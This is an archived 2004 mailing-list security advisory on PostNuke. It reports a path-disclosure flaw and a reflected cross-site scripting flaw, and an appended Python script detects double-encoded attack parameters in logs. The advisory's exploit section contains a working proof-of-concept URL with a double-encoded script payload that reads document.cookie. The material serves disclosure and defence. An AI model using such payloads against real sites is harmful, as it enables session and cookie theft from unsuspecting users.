Full Disclosure mailing list archives
Multiple vulnerabilities PostNuke
From: "DarkBicho" <darkbicho () fastmail fm>
Date: Sun, 18 Jul 2004 03:09:58 -0700
Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt

-------------------------------------------------------------------------
            :.: Multiple vulnerabilities PostNuke :.:

  PROGRAM:  PostNuke
  HOMEPAGE: http://www.postnuke.com/
  VERSION:  0.75-RC3, 0.726-3
  BUG:      Multiple vulnerabilities
  DATE:     14/05/2004
  AUTHOR:   DarkBicho
            web:   http://www.darkbicho.tk
            team:  Security Wari Projects <www.swp-zone.org>
                   Perunderforce <www.perunderforce.tk>
            Email: darkbicho () peru com
-------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    PostNuke is a popular content management system, written in PHP.

2.- Vulnerabilities:
    ---------------

  A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.

    http://localhost/html/modules/Xanthia/pnadmin.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53

    http://localhost/html/modules/Xanthia/pnuserapi.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49

  B. Cross-Site Scripting aka XSS:

    Error: function showcontent()

    :.: title : Line 986

    --------------------------------- code ---------------------------------
    echo "<p><span class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
    </em></strong></span><br />";
    echo "<p align=\"justify\"><span class=\"pn-normal\">";
    if ($cover != "")
    -------------------------------------------------------------------------

3.- EXPLOIT:
    -------

    http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent
    &id=1&title=%253cscript>alert%2528document.cookie);%253c/script>

    Example:
    -------

    http://www.swp-zone.org/archivos/post-nuke.gif

4.- SOLUTION:
    --------

    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. Check the PostNuke website for updates and official
    release details.

5.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D

    "PISCO IS AND WILL BE PERUVIAN"

5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbicho () peru com

-------------------------------------------------------------------------
    Security Wari Projects
    (c) 2002 - 2004
    Made in Peru
--------------------------------[ EOF ]----------------------------------

DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
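
A detection-side sketch for the request form shown in section 3, added here as an example and not part of the original advisory: it flags query parameters whose markup characters only appear after a second URL-decode pass. The log lines are constructed, and the function names and the five-pass cap are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

MARKUP = re.compile(r"[<>\"'()]")   # characters that matter in an HTML/JS context
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MAX_PASSES = 5                      # assumption: cap on decode rounds to bound work


def decode_depth(value):
    """URL-decode repeatedly; return (passes that changed the value, final text)."""
    passes = 0
    while passes < MAX_PASSES:
        decoded = unquote(value)
        if decoded == value:
            break
        value, passes = decoded, passes + 1
    return passes, value


def scan(lines):
    """Return (parameter, passes, hidden markup) for each nested-encoded parameter."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            once = unquote(raw)     # what the application sees after normal decoding
            passes, final = decode_depth(raw)
            # Markup absent after one decode but present after further decoding.
            hidden = set(MARKUP.findall(final)) - set(MARKUP.findall(once))
            if passes >= 2 and hidden:
                findings.append((name, passes, "".join(sorted(hidden))))
    return findings


# Constructed access-log lines: the advisory's request form, a benign review
# title with single-encoded parentheses, and a request with no query string.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2004:03:10:00 -0700] "GET /html/modules.php?op=modload'
    '&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528'
    'document.cookie);%253c/script> HTTP/1.0" 200 5120',
    '203.0.113.9 - - [18/Jul/2004:03:11:12 -0700] "GET /html/modules.php?name=Reviews'
    '&req=showcontent&id=2&title=Great%20review%20%2810%2F10%29 HTTP/1.0" 200 4980',
    '203.0.113.9 - - [18/Jul/2004:03:12:40 -0700] "GET /html/modules/Xanthia/'
    'pnadmin.php HTTP/1.0" 200 310',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
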